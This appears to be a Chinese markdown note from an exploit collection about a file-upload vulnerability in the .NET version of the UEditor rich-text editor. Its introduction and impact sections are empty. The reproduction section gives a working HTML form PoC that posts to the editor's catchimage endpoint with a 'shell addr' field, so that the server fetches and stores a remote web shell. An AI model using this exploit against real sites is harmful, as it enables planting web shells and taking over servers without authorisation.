ueditor .net版本上传漏洞.md

450 B / 2021-07-15 20:08:20

    ueditor .net版本上传漏洞
========================

一、漏洞简介
------------

二、漏洞影响
------------

三、复现过程
------------

本地上传poc

    <form action="http://www.xxxxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">
    shell addr: <input type="text" name="source[]" />
     <input type="submit" value="Submit" />
    </form>

上传文件名为 1